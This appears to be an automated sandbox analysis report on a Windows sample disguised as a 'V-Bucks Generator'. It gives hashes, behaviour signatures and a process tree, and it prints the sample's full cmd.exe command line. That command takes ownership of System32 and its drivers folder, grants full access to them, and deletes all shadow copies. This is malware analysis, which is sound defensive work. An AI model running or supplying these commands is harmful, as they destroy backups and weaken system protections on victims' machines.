Analysis
-
max time kernel
21s -
max time network
19s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
14-08-2024 12:09
Static task
static1
Behavioral task
behavioral1
Sample
V-Bucks Generator.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
V-Bucks Generator.exe
Resource
win10v2004-20240802-en
General
-
Target
V-Bucks Generator.exe
-
Size
458KB
-
MD5
d5e63bc0a087c9cda1215688405b6fb2
-
SHA1
e32d08d66878bf50458cd8674dfc581a6fc611d4
-
SHA256
9bf2689546105532a778dc6a0a6e964ece8ff33c4fcea28e82c29940e06d2666
-
SHA512
cdc9610af7562bca20bb29a14b7acb0facef90f15b21ad4d0006e5dc2afc9533cd406c7735dcc9c1e353cc04ff4b480d7d0229be59e2b0e51ed91bbef4298f12
-
SSDEEP
12288:QGchrYmYRz1T/I/x/c/Qkrn5gA6IG+rQFR:SrqJT/Cw5gA6Iy
Malware Config
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4080 takeown.exe 2784 icacls.exe 4952 takeown.exe 4932 icacls.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
V-Bucks Generator.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation V-Bucks Generator.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 4932 icacls.exe 4080 takeown.exe 2784 icacls.exe 4952 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 5056 vssadmin.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
takeown.exetakeown.exevssvc.exedescription pid process Token: SeTakeOwnershipPrivilege 4952 takeown.exe Token: SeTakeOwnershipPrivilege 4080 takeown.exe Token: SeBackupPrivilege 956 vssvc.exe Token: SeRestorePrivilege 956 vssvc.exe Token: SeAuditPrivilege 956 vssvc.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
V-Bucks Generator.execmd.exedescription pid process target process PID 4536 wrote to memory of 2300 4536 V-Bucks Generator.exe cmd.exe PID 4536 wrote to memory of 2300 4536 V-Bucks Generator.exe cmd.exe PID 2300 wrote to memory of 4952 2300 cmd.exe takeown.exe PID 2300 wrote to memory of 4952 2300 cmd.exe takeown.exe PID 2300 wrote to memory of 4932 2300 cmd.exe icacls.exe PID 2300 wrote to memory of 4932 2300 cmd.exe icacls.exe PID 2300 wrote to memory of 4080 2300 cmd.exe takeown.exe PID 2300 wrote to memory of 4080 2300 cmd.exe takeown.exe PID 2300 wrote to memory of 2784 2300 cmd.exe icacls.exe PID 2300 wrote to memory of 2784 2300 cmd.exe icacls.exe PID 2300 wrote to memory of 5056 2300 cmd.exe vssadmin.exe PID 2300 wrote to memory of 5056 2300 cmd.exe vssadmin.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && vssadmin delete shadows /all /quiet && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4932
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2784
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5056
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:956